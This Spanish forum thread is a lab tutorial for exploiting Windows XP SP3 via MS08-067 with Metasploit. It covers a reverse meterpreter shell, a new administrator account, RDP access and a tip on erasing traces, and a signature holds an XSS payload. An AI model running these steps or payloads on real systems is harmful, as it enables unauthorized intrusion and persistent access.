comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Obtener GUI tras explotar Windows XP con Metasploit y meterpreter

  • 4 Respuestas
  • 3373 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Jimeno

  • *
  • Underc0der
  • Mensajes: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
    • Ver Perfil
    • Twitter
  • Skype: migueljimeno96
  • Twitter: "><<img src=y onerror=prompt();>
« en: Febrero 15, 2013, 11:54:16 am »



Buenas, en este post se muestra al proceso mediante el cual se accede a un Windows XP SP3 en una red LAN desde metasploit, se obtiene una sesión con meterpreter en el sistema y luego se añade un usuario con privilegios de administrador al sistema. Por último se obtiene una GUI remota, lo que podría facilitar determinadas acciones.
Si luego se quieren eliminar rastros una de las cosas más importantes es eliminar desde meterpreter el usuario creado.

Para esta práctica se utilizan:
   - BackTrack 5 R3
   - Windows XP SP3 virtualizado en VMWare Player

En todo momento se deben sustituir los valores:

   "miIP" por vuestra IP Local
   "suIP" por la IP de la máquina a vulnerar
   "tuusuario" por el nombre de usuario que elijas
   "tupass" por la contraseña que elijas

 Una vez presentado el entorno, aquí van los pasos:
   1- Comprobar la máquina vulnerada, para hacerlo de forma rápida se utilizará nmap. Sintaxis: nmap -O suIP
   2- Una vez comprobado, ejecutar la consola de Metasploit. Sintaxis: msfconsole
   3- Cargar el exploit. En este caso utilizamos uno que ataca al protocolo smb. Sintaxis: use exploit/windows/smb/ms08_067_netapi
   4- Seleccionamos un PAYLOAD, se utilizará un meterpreter con conexión inversa. Sintaxis: set PAYLOAD windows/meterpreter/reverse_tcp
   5- Se coloca la IP local. Sintaxis: set LHOST miIP
   6- Se coloca la IP remota. Sintaxis: set RHOST suIP
   7- Comprobar que no queden campos vacíos (opcional). Sintaxis: show options
   Debe salir algo así:

Citar
msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.153    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.102    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


Nota: los campos de las IP deben ser los vuestros
   8- Lanzar el exploit. Sintaxis: exploit
   9- Una vez en meterpreter se obtiene el sistema. Sintaxis: getsystem
   10- Una vez tenemos privilegios hay que crear un nuevo usuario. sintaxis: run getgui -u tuusuario -p tupass -e
   11- Obtenemos una shell en el sistema. Sintaxis: shell
   12- Elevar privilegios al usuario. Sintaxis: net localgroups administradores tuusuario /add    Donde administradores es el nombre del grupo de admins.
   13- En una nueva pestaña de la terminal se utiliza la herramienta rdesktop. Sintaxis: rdesktop -u tuusuario -p tupass suIP

Y se abre una ventana con la GUI.



Un saludo ((:

« Última modificación: Febrero 15, 2013, 12:49:04 pm por Jimeno »
Contacto: @migueljimeno96 -

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
« Respuesta #1 en: Febrero 15, 2013, 12:50:52 pm »
dale se nota ya has llegado a la parte de post-explotación de metaesploit para pentesters xd
PD : Buen post
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Desconectado Jimeno

  • *
  • Underc0der
  • Mensajes: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
    • Ver Perfil
    • Twitter
  • Skype: migueljimeno96
  • Twitter: "><<img src=y onerror=prompt();>
« Respuesta #2 en: Febrero 15, 2013, 01:03:34 pm »
Sí, Sanko, la idea está sacada del libro, pero llegué hace mucho, de hecho lo terminé antes de fin de año.
Gracias ((:

No tienes permisos para ver links. Registrate o Entra con tu cuenta
dale se nota ya has llegado a la parte de post-explotación de metaesploit para pentesters xd
PD : Buen post
Contacto: @migueljimeno96 -

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
« Respuesta #3 en: Febrero 15, 2013, 01:06:07 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Sí, Sanko, la idea está sacada del libro, pero llegué hace mucho, de hecho lo terminé antes de fin de año.
Gracias ((:

No tienes permisos para ver links. Registrate o Entra con tu cuenta
dale se nota ya has llegado a la parte de post-explotación de metaesploit para pentesters xd
PD : Buen post
No es nada malo por si sono mal xd , lo del libro lo decia porque no hace mas de 3 dias acabe de leer sobre ello
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5380
  • Actividad:
    75%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #4 en: Febrero 16, 2013, 05:41:53 pm »
Excelente aporte!
Lo pondremos en el blog!

No tienes permisos para ver links. Registrate o Entra con tu cuenta


 

¿Te gustó el post? COMPARTILO!



Sniffer para windows "RawCap"

Iniciado por s747ik

Respuestas: 1
Vistas: 1999
Último mensaje Junio 12, 2011, 04:08:03 pm
por staRgan
Aplicación para enviar comandos a pc remota (Windows)

Iniciado por fermino

Respuestas: 6
Vistas: 4375
Último mensaje Noviembre 01, 2013, 08:23:34 pm
por aquelalle
Crackear password de administrador en windows usando Backtrack 3

Iniciado por Devilboy

Respuestas: 3
Vistas: 2959
Último mensaje Marzo 24, 2010, 12:46:31 am
por ||•?¤?- SeCurity-?¤?•||
Hackear servidor windows (ACTUALIZADO) + Cambiar DNS - By Ixidion13

Iniciado por Stiuvert

Respuestas: 0
Vistas: 2634
Último mensaje Abril 26, 2011, 06:05:06 pm
por Stiuvert
Como entrar en una maquina windows con recursos compartidos.

Iniciado por ANTRAX

Respuestas: 1
Vistas: 2372
Último mensaje Febrero 18, 2010, 02:27:46 pm
por OSX